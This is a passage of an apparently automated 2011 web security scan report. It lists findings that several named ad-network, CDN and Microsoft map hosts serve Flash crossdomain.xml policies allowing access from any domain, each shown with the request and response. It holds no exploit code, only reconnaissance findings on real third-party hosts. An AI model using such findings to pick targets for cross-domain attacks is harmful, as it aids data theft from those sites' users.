Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 13:14:23 GMT
Accept-Ranges: bytes
Date: Tue, 19 Jul 2011 20:42:35 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

5.4. http://a.netmng.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:07 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "18273e-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a.ok.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ok.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.ok.facebook.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:57:50 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 19 Jul 2011 14:58:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://admeld.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.9. http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

5.10. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 22:26:02 GMT
ETag: "53000b-fc-4a7e6c8eaf280"
Content-Type: text/xml
Date: Tue, 19 Jul 2011 20:42:55 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://adx.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.12. http://api.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Tue, 12 Apr 2011 10:51:02 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Tue, 19 Jul 2011 20:43:17 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.13. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Wed, 20 Jul 2011 14:26:45 GMT
Date: Tue, 19 Jul 2011 14:26:45 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.14. http://b3.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.15. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 19 Jul 2011 18:37:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.16. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 19 Jul 2011 20:43:12 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.17. http://c.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 19 Jul 2011 14:24:25 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.18. http://cache.specificmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:20 GMT
Server: PWS/1.7.2.3
X-Px: ms jfk-agg-n63 ( jfk-agg-n58), ht-d jfk-agg-n58.panthercdn.com
ETag: "e8a17-110-476483d0fa140"
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 01:38:10 GMT
Age: 68770
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 11:42:21 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.19. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 19 Jul 2011 20:43:08 GMT
Date: Tue, 19 Jul 2011 20:43:08 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.20. http://creatives.as4x.tmcs.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://creatives.as4x.tmcs.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: creatives.as4x.tmcs.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

5.21. http://d.agkn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 19 Jul 2011 20:44:50 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

5.22. http://dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:45 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.api.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.api.tiles.virtualearth.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 13 Jul 2011 18:25:34 GMT
Accept-Ranges: bytes
ETag: "89839418a41cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:42 GMT
Connection: close
Content-Length: 207

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.24. http://ecn.dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 30 Jun 2011 21:42:15 GMT
Accept-Ranges: bytes
ETag: "98928946e37cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:43 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.25. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78401
Date: Tue, 19 Jul 2011 12:24:12 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.26. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 78331
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.27. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 118980
Date: Tue, 19 Jul 2011 12:24:13 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.28. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "54b6e26d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 81536
Date: Tue, 19 Jul 2011 12:24:10 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.29. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.30. http://farecastcom.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farecastcom.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:29 GMT
Server: Omniture DC/2.0.0
xserver: www261
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.31. http://files.livedrive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://files.livedrive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: files.livedrive.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 11 Mar 2011 17:51:48 GMT
Accept-Ranges: bytes
ETag: "b0ee90fe14e0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:11 GMT
Connection: close
Content-Length: 141

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

5.32. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.33. http://img1.catalog.video.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:23:55 GMT
Content-Length: 177
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

